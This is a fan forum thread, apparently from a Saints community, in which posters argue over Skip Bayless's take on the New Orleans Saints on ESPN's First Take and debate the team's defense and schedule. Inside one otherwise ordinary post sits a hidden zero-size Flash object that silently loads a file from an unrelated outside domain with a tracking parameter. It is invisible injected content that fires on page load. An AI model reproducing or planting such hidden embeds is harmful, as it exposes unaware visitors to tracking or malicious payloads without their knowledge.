ESPN First Take's 1st and 10...Skip just said the Saints... (1 Viewer)

There are still columnists who think that this year's Saints defense is still last year's...

It's still too early yet to make these kinds of judgments. SF ldoes look legit with Singletary running the show and Gore healthy again. Minnesota also looks pretty talented. Atlanta is 2-0, and while we'd all like to say they haven't played a good team yet the fact is they took care of business and have a good QB. And you can't count out the Giants, despite the fact that they don't look great right now. It's a long season, and there's lots of teams still in the mix. Remember, the Pats went 16-0 and then promptly lost their first playoff game that year. You can bet Payton is telling the boys in black and gold, 1 game at a time, fellas.

Wrong! He talked up the Saints on Friday, then he told Jay that HE (Jay) took all of his (Skip's) arguing points, because Jay was arguing with Jimela (whatever her name is)...
I didn't see it that way. he argues whatever the 1st person says, that way the ESPN always has someone say the "correct" answer. The perception that he will stand by a previous opinion is misguided. He is notorious for contradicting himself for the sake of the arguement. I promise you if Ms.J took the saints, he would have took the giants.

he took the saints because the woman who went first took the giants. notice how he told the host "she took all my points" . his job is to argue what the 1st person says, and he's good at his job. take it with a grain of salt..

No, he said "you took all my points"...talking to the moderator guy who was challenging the chick on her answer of the Giants. He said "well McNabb doesn't play defense" when she tryed to pull out the "well who have the Saints really played" card.

Skip Bayless being a clown aside, I thought the lady's arguement was weak. Same ole crap.

"I like smashmouth football and defense"...yeah real smashmouth when the Giants couldn't run the ball and gave up 251 yards rushing and 450 yards of offense even with Romo giftwrapping 3 INT's, 2 of which were just terrible.

Then the normal "well they can't win in the cold" stuff came out, ignoring the fact that minus the playoffs, we really won't have to play in the cold at all this year. With homefield cold weather could be an irrelevant factor this season.

But back to your assertion that he'd of taken the Giants; it's false. This stuff is pre-planned and the two points before that he and the lady agreed on the topic. Yeah though. Bayless is still a goober.

No, he said "you took all my points"...talking to the moderator guy who was challenging the chick on her answer of the Giants.

Skip Bayless being a clown aside, I thought the lady's arguement was weak. Same ole crap.

"I like smashmouth football and defense"...yeah real smashmouth when the Giants couldn't run the ball and gave up 251 yards rushing and 450 yards of offense even with Romo giftwrapping 3 INT's, 2 of which were just terrible.

Then the normal "well they can't win in the cold" stuff came out, ignoring the fact that minus the playoffs, we really won't have to play in the cold at all this year. With homefield cold weather will be an irrelevant factor this season.

fixed ;)

Sorry to off the subject of the thread but did anybody noticed when halftime was over Pam Oliver was reporting bs about the eagles are wildcaten fools out there.

I Never put stock in what Skip has said before now, and I will not put any importance on what he says now about the Saints, whether I agree or not...

No, he said "you took all my points"...talking to the moderator guy who was challenging the chick on her answer of the Giants.
yeah you are right bon, he did say "jay, you took all my points" . and you are probably right about the scripting, but i honestly believe it's more or less a coin flip on who takes which side..

oh and you're also right about the gooberism..:hihi:

Does anyone really care what this clown says?<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

No, I like it when no one talks about us. This clowns are always wrong anyway!

Yeah he said The Offense put up 41..then Darren Sharper added 7 more to get to 48 which makes our Defense something to worry about.

that's funny cause everyone in the media talked about how our Defense gave up 27 to the Lions, but failed to say they returned a fumble for a TD on Defense. even when we get respect we don't really get it.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom